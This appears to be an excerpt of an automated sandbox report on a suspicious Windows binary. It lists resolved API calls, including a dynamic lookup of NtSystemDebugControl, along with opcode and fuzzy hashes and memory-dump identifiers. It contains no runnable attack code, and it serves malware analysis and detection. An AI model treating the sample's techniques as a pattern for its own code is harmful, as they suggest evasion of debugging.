                                                                                    • Instruction ID: 0560c3a65b60a7c4de9144323a5a9cb8c8049e9816a91a55e8119252fc183855
                                                                                    • Opcode Fuzzy Hash: 3442f275c69ce3a877591c2450b33f003beada7450b7b0c34ebad466ad88ac56
                                                                                    • Instruction Fuzzy Hash: DE017C72902128BBCF21ABD6DC48DDFBF3DEF85720F104022FA16A51A0D6714A19CBA1
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00AD1334
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00AD133B
                                                                                    • memset.MSVCRT ref: 00AD1359
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProcmemset
                                                                                    • String ID: NtSystemDebugControl$ntdll.dll
                                                                                    • API String ID: 3137504439-2438149413
                                                                                    • Opcode ID: cf26986141fb893e793224c544cbb809a9d5eb7aa82ef999f2aedb23cbb6e447
                                                                                    • Instruction ID: 319d930979023a46c88b090aa686cf009dc50e61e58fdfe6f3b9ab6c2f48f15e
                                                                                    • Opcode Fuzzy Hash: cf26986141fb893e793224c544cbb809a9d5eb7aa82ef999f2aedb23cbb6e447
                                                                                    • Instruction Fuzzy Hash: 18016D72601309BFDF10DF99AC85AAFBBB8FB55714F00452BF923A6240E2708A15CA51
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: strrchr$lstrcmpilstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3636361484-0
                                                                                    • Opcode ID: 7253fd09577dd2e1eb4164d327b18a34d92d89dd811501f090ba9cf5dc6b22c9
                                                                                    • Instruction ID: 2dda05bf4d16147dc274192c9b4893f95f9b801c739d3923a5a45a8579137e05
                                                                                    • Opcode Fuzzy Hash: 7253fd09577dd2e1eb4164d327b18a34d92d89dd811501f090ba9cf5dc6b22c9
                                                                                    • Instruction Fuzzy Hash: 9901F9B39042197FEF2097A0EC48BE677ECDB04310F440467EA97E3190EE74DA858BA0
                                                                                    APIs
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00AD1F92,00000000,?,00000000,?,?,?,00AD1F92,?,00000000,00000002), ref: 00AD1867
                                                                                    • srand.MSVCRT ref: 00AD1878
                                                                                    • rand.MSVCRT ref: 00AD1880
                                                                                    • srand.MSVCRT ref: 00AD1890
                                                                                    • rand.MSVCRT ref: 00AD1894
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: Timerandsrand$FileSystem
                                                                                    • String ID:
                                                                                    • API String ID: 4106363736-0
                                                                                    • Opcode ID: 53372b6cbd9b8d6aa7c66b0e6559361a7de57f2f4fc9c8e5af80f6d992a0c7ef
                                                                                    • Instruction ID: cde4a6497165ae883c99bdbc7d3652df988569285ab06b31cb235bc7530865ad
                                                                                    • Opcode Fuzzy Hash: 53372b6cbd9b8d6aa7c66b0e6559361a7de57f2f4fc9c8e5af80f6d992a0c7ef
                                                                                    • Instruction Fuzzy Hash: 97E0DF77A00218BBDB00E7F9EC468DEBBACEE84161B100527F601E3250E9B0FD458AB4
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00AD603C
                                                                                    • GetProcAddress.KERNEL32(00000000,00AD6064), ref: 00AD604F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: kernel32.dll
                                                                                    • API String ID: 1646373207-1793498882
                                                                                    • Opcode ID: 001b0a64a6a2622bc4c5070945b9739922a35129a8e6ef37ada50d1f7b0dea3c
                                                                                    • Instruction ID: e0059d1e98b33e8de8f9a12899baab15c3ba60594a25b34c27def775e4de1b5a
                                                                                    • Opcode Fuzzy Hash: 001b0a64a6a2622bc4c5070945b9739922a35129a8e6ef37ada50d1f7b0dea3c
                                                                                    • Instruction Fuzzy Hash: 6BF0F0F51402899FEF708FA4CC44BDE3BE4EB05700F50442BEA0ACB381CB3486058B64